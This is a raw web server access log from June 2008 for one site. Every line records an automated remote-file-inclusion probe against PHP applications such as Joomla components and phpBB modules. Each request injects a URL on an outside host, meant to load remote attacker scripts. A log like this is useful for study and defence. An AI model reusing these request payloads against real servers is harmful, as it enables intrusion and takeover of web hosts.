64.118.88.84 - - [11/Jun/2008:12:09:13 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:09:13 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.234.119.86 - - [11/Jun/2008:12:09:16 -0700] "GET //error.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.234.119.86 - - [11/Jun/2008:12:09:16 -0700] "GET /logs/access_080117.log//error.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.234.119.86 - - [11/Jun/2008:12:09:16 -0700] "GET /logs//error.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.184.14 - - [11/Jun/2008:12:09:22 -0700] "GET /logs/access_080216.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:12:09:30 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/paijoe_emo/bot_id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:12:09:31 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/paijoe_emo/bot_id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:12:09:31 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/paijoe_emo/bot_id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:12:09:32 -0700] "GET /logs/access_080312.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:12:09:32 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:12:09:33 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
79.171.18.36 - - [11/Jun/2008:12:09:36 -0700] "GET /logs/access_080123.log//errors.php?error=http://www.pescandoconmosca.cl//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.119.86 - - [11/Jun/2008:12:09:42 -0700] "GET /logs/access_080117.log//error.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.234.119.86 - - [11/Jun/2008:12:09:43 -0700] "GET //error.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.234.119.86 - - [11/Jun/2008:12:09:43 -0700] "GET /logs//error.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.38.55.145 - - [11/Jun/2008:12:09:48 -0700] "GET /logs/access_080117.log//error.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.55.145 - - [11/Jun/2008:12:09:48 -0700] "GET //error.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.55.145 - - [11/Jun/2008:12:09:49 -0700] "GET /logs//error.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:09:49 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.38.55.145 - - [11/Jun/2008:12:09:49 -0700] "GET /logs/access_080117.log//error.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:09:49 -0700] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.38.55.145 - - [11/Jun/2008:12:09:49 -0700] "GET //error.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.55.145 - - [11/Jun/2008:12:09:50 -0700] "GET /logs//error.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.230.197.170 - - [11/Jun/2008:12:09:55 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.71.79 - - [11/Jun/2008:12:10:13 -0700] "GET /logs/access_080117.log//index.php?mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.71.79 - - [11/Jun/2008:12:10:15 -0700] "GET //index.php?mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1" 200 18473 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.71.79 - - [11/Jun/2008:12:10:16 -0700] "GET /logs//index.php?mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.19.188.13 - - [11/Jun/2008:12:10:20 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://swzx.jlu.edu.cn/test/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.188.13 - - [11/Jun/2008:12:10:20 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://swzx.jlu.edu.cn/test/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:10:23 -0700] "GET /logs/index2.php?x=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:10:24 -0700] "GET /index2.php?x=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.63.85.187 - - [11/Jun/2008:12:10:24 -0700] "GET /amember/plugins/payment/secpay/config.inc.php?config%5Broot_dir%5D=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.221.63 - - [11/Jun/2008:12:10:35 -0700] "GET /logs/access_080117.log//error.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.221.63 - - [11/Jun/2008:12:10:36 -0700] "GET //error.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.221.63 - - [11/Jun/2008:12:10:36 -0700] "GET /logs//error.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.221.63 - - [11/Jun/2008:12:10:40 -0700] "GET /logs/access_080117.log//error.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.221.63 - - [11/Jun/2008:12:10:40 -0700] "GET //error.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.221.63 - - [11/Jun/2008:12:10:41 -0700] "GET /logs//error.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.38.55.145 - - [11/Jun/2008:12:10:49 -0700] "GET //error.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:12:11:09 -0700] "GET /logs/access_071224.log//admin/index.php?o=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.56.36 - - [11/Jun/2008:12:11:18 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.grupslactancia.info/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:11:35 -0700] "GET /logs/access_080119.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.7.207.104 - - [11/Jun/2008:12:11:48 -0700] "GET /logs/access_080118.log/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.207.104 - - [11/Jun/2008:12:11:48 -0700] "GET /modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.207.104 - - [11/Jun/2008:12:11:48 -0700] "GET /logs/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.135.183.134 - - [11/Jun/2008:12:11:53 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.135.183.134 - - [11/Jun/2008:12:11:53 -0700] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:12:11:58 -0700] "GET /logs/access_080312.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/paijoe_emo/bot_id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.58.154.237 - - [11/Jun/2008:12:12:19 -0700] "GET /logs/access_080221.log/////?mosConfig_absolute_path=http://www.linuxmaniacrew.altervista.org/feeee/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.56.36 - - [11/Jun/2008:12:12:21 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.grupslactancia.info/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.58.154.237 - - [11/Jun/2008:12:12:23 -0700] "GET /////?mosConfig_absolute_path=http://www.linuxmaniacrew.altervista.org/feeee/text.txt? HTTP/1.1" 200 18459 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [11/Jun/2008:12:12:24 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.linuxmaniacrew.altervista.org/feeee/text.txt? HTTP/1.1" 200 51425 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.56.36 - - [11/Jun/2008:12:12:28 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.58.154.237 - - [11/Jun/2008:12:12:54 -0700] "GET /logs/access_080308.log/////?mosConfig_absolute_path=http://www.linuxmaniacrew.altervista.org/feeee/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [11/Jun/2008:12:13:03 -0700] "GET /logs/access_080312.log/errors.php?error=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [11/Jun/2008:12:13:03 -0700] "GET /errors.php?error=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [11/Jun/2008:12:13:04 -0700] "GET /logs/errors.php?error=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.140.99 - - [11/Jun/2008:12:13:07 -0700] "GET /logs/access_080301.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://soesy.barcah.web.id/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [11/Jun/2008:12:13:07 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://soesy.barcah.web.id/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [11/Jun/2008:12:13:07 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://soesy.barcah.web.id/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:12:13:09 -0700] "GET /logs/access.log/components/com_joomlaboard/image_upload.php?sbp=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:12:13:10 -0700] "GET /components/com_joomlaboard/image_upload.php?sbp=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:12:13:11 -0700] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.135.183.134 - - [11/Jun/2008:12:13:27 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.135.183.134 - - [11/Jun/2008:12:13:28 -0700] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
72.52.136.89 - - [11/Jun/2008:12:13:34 -0700] "GET /logs/access_080118.log/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.98.140.99 - - [11/Jun/2008:12:13:39 -0700] "GET /logs/access_080229.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://soesy.barcah.web.id/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.52.136.89 - - [11/Jun/2008:12:13:39 -0700] "GET /logs/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.194.71.79 - - [11/Jun/2008:12:13:46 -0700] "GET /logs/access_080328.log//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.71.79 - - [11/Jun/2008:12:13:49 -0700] "GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1" 200 18553 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.71.79 - - [11/Jun/2008:12:13:50 -0700] "GET /logs//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.98.140.99 - - [11/Jun/2008:12:13:56 -0700] "GET /logs/access_080301.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [11/Jun/2008:12:13:56 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [11/Jun/2008:12:13:56 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [11/Jun/2008:12:14:07 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.194.71.79 - - [11/Jun/2008:12:14:14 -0700] "GET /logs/access_080331.log//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.98.140.99 - - [11/Jun/2008:12:14:25 -0700] "GET /logs/access_080229.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.38.55.145 - - [11/Jun/2008:12:14:36 -0700] "GET /logs/access_080217.log//error.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.55.145 - - [11/Jun/2008:12:14:41 -0700] "GET /logs/access_080217.log//error.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:15:37 -0700] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [11/Jun/2008:12:15:42 -0700] "GET /logs/errors.php?error=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [11/Jun/2008:12:15:43 -0700] "GET /errors.php?error=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.171.18.36 - - [11/Jun/2008:12:16:20 -0700] "GET //errors.php?error=http://www.pescandoconmosca.cl//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.236 - - [11/Jun/2008:12:17:41 -0700] "GET /logs/access_080429.log/index.php?module=search&q=marks//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
130.102.113.158 - - [11/Jun/2008:12:18:16 -0700] "GET /logs/access_080106.log/components/com_joomlaboard/file_upload.php?sbp=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [11/Jun/2008:12:18:17 -0700] "GET /logs/access_080215.log//authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [11/Jun/2008:12:18:18 -0700] "GET //authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [11/Jun/2008:12:18:18 -0700] "GET /logs//authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.167.156.20 - - [11/Jun/2008:12:18:23 -0700] "GET //components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.7.207.104 - - [11/Jun/2008:12:18:47 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.207.104 - - [11/Jun/2008:12:18:48 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:12:18:59 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:12:19:04 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.72.181.15 - - [11/Jun/2008:12:19:04 -0700] "GET /logs/access_080228.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:12:19:05 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:19:39 -0700] "GET /logs/access.log/index2.php?x=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:19:39 -0700] "GET /index2.php?x=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:19:39 -0700] "GET /logs/index2.php?x=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:20:00 -0700] "GET /logs/access_080117.log//index.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:20:05 -0700] "GET //index.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 200 18415 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:20:06 -0700] "GET /logs//index.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:12:20:21 -0700] "GET /logs/access_080113.log/errors.php?error=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:12:20:24 -0700] "GET /errors.php?error=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:12:20:25 -0700] "GET /logs/errors.php?error=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:20:27 -0700] "GET /logs/access_080106.log/index2.php?x=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:12:20:31 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:12:20:32 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:12:20:33 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:12:21:13 -0700] "GET /logs/access_080115.log/errors.php?error=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.1.202.61 - - [11/Jun/2008:12:21:55 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.1.202.61 - - [11/Jun/2008:12:21:58 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:22:08 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:22:08 -0700] "GET /phphtml.php?htmlclass_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:22:09 -0700] "GET /logs/phphtml.php?htmlclass_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:22:10 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:22:11 -0700] "GET /phphtml.php?htmlclass_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:22:11 -0700] "GET /logs/phphtml.php?htmlclass_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.218.234.146 - - [11/Jun/2008:12:23:05 -0700] "GET /logs//errors.php?error=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [11/Jun/2008:12:23:05 -0700] "GET //errors.php?error=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:12:23:07 -0700] "GET /logs/access_080123.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.94.129.31 - - [11/Jun/2008:12:23:09 -0700] "GET //include.php?path[docroot]=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
